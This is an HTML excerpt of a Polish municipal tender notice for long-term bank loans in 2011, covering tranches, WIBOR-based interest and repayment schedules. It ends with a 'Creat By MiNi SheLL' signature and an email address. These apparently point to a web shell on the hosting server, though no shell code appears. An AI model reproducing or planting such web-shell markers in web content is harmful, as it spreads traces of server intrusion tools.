g)  oprocentowanie  kredytu zmienne w całym okresie kredytowania w oparciu o stawkę WIBOR  jedno miesięczny (WIBOR 1M) powiększony o proponowaną marżę banku,
h)  zabezpieczenie kredytu: weksel in blanco wraz z deklaracją wekslową, 
 i)   prowizja płatna w dniu uruchomienia transzy,
j)	 Zamawiający zastrzega sobie:
 - zmianę ilości, kwot i terminów uruchomienia transz kredytu, bez dodatkowych kosztów,
          - prawo wcześniejszej spłaty kredytu lub rezygnacji z części kredytu  bez dodatkowych  kosztów związanych z wcześniejszą spłatą,
 - odsetki będą naliczane wyłącznie od kapitału niespłaconego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.12.2018.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> kredyt długoterminowy   zaciągnięty   do   kwoty  1.500.000,00  zł (słownie:  jeden  milion pięćset  tysięcy  złotych  00/100) z przeznaczeniem na sfinansowanie planowanego w 2011 r. deficytu budżetu gminy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	okres kredytowania do 10 lat,
   b)  przewidziany termin postawienia środków finansowych do dyspozycji Zamawiającego od dnia podpisania umowy,
c)  dostępność kredytu:
- transza w wysokości do kwoty 1.000.000,00 zł płatna w dniu 28 grudnia 2011 r.,
- transza w wysokości do kwoty 500.000,00 zł płatna w dniu 29 grudnia 2011 r.,
 d) spłata odsetek od zaciągniętego kredytu nastąpi w okresach miesięcznych, począwszy od  marca 2012 r.  płatnych w 27 dniu każdego miesiąca,
e) spłata kredytu nastąpi w miesięcznych ratach kapitałowych, płatnych w 27 dniu każdego miesiąca, z uwzględnieniem karencji do 31.12.2012 r., począwszy od 2013 r., a następnie  w latach 2019 - 2020 r., zgodnie z poniższym harmonogramem:
      -  w roku 2013: 600.000,00 zł, tzn. miesięczne raty po 50.000,00 zł,
-	w roku 2019: 600.00,00 zł, tzn. miesięczne raty po 50.000,00 zł,
-	w roku 2020: 300.00,00 zł, tzn. miesięczne raty po 25.000,00 zł,
f)  w przypadku, gdy termin spłaty kredytu lub odsetek  przypadnie w dzień wolny od pracy, to Zamawiający ureguluje wymaganą ratę w pierwszy dzień roboczy następujący po wyznaczonej dacie spłaty,
g) oprocentowanie  kredytu zmienne w całym okresie kredytowania w oparciu o stawkę WIBOR  jedno miesięczny (WIBOR 1M) powiększony o proponowaną marżę banku,
h)  zabezpieczenie kredytu: weksel in blanco wraz z deklaracją wekslową, 
 i)   prowizja płatna w dniu uruchomienia transzy,
j)	 Zamawiający zastrzega sobie:
 -  zmianę ilości, kwot i terminów uruchomienia transz kredytu, bez dodatkowych kosztów,
          - prawo wcześniejszej spłaty kredytu lub rezygnacji z części kredytu  bez dodatkowych kosztów związanych z wcześniejszą spłatą,
  - odsetki będą naliczane wyłącznie od kapitału niespłaconego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.12.2020.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kredyt długoterminowy  zaciągnięty do kwoty 220.000,00 zł (słownie: dwieście dwadzieścia tysięcy złotych 00/100)  w  roku 2011  na realizację inwestycji Przebudowa drogi gminnej  nr  102983 O  -  ul.  Studzienna  oraz  drogi  gminnej  w 103004 O - ul. Zielona w miejscowości Dobrodzień.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	okres kredytowania do 8 lat,
   b)  przewidziany termin postawienia środków finansowych do dyspozycji Zamawiającego od dnia podpisania umowy,
c)  dostępność kredytu:
- transza w wysokości do kwoty 220.000,00 zł płatna w dniu 28 grudnia 2011 r.,
 d) spłata odsetek od zaciągniętego kredytu nastąpi w okresach miesięcznych, począwszy od  marca 2012 r.  płatnych w 27 dniu każdego miesiąca,
e) spłata kredytu nastąpi w miesięcznych ratach kapitałowych, płatnych w 27 dniu każdego miesiąca, z uwzględnieniem karencji do 31.12.2015 r., począwszy od 2016 r. do 2018 r., zgodnie z poniższym harmonogramem:
-	w roku 2016: 46.000,00 zł, tzn. 11 miesięcznych rat po 3.800,00 zł i 1 rata w wysokości 4.200,00 zł, 
-	w roku 2017: 46.000,00 zł, tzn. 11 miesięcznych rat po 3.800,00 zł i 1 rata w wysokości 4.200,00 zł,
-	w roku 2018: 128.000,00 zł, tzn. 11 miesięcznych rat po 10.700,00 zł i 1 rata w wysokości 10.300,00 zł,
 f)  w przypadku, gdy termin spłaty kredytu lub odsetek  przypadnie w dzień wolny od pracy, to Zamawiający ureguluje wymaganą ratę w pierwszy dzień roboczy następujący po wyznaczonej dacie spłaty,
g)  oprocentowanie  kredytu zmienne w całym okresie kredytowania w oparciu o stawkę WIBOR  jedno miesięczny (WIBOR 1M) powiększony o proponowaną marżę banku,
h)  zabezpieczenie kredytu: weksel in blanco wraz z deklaracją wekslową, 
 i)  prowizja płatna w dniu uruchomienia transzy,
j)	Zamawiający zastrzega sobie:
- zmianę ilości, kwot i terminów uruchomienia transz kredytu, bez dodatkowych kosztów,
         - prawo wcześniejszej spłaty kredytu lub rezygnacji z części kredytu  bez dodatkowych kosztów związanych z wcześniejszą spłatą,
 - odsetki będą naliczane wyłącznie od kapitału niespłaconego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.12.2018.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com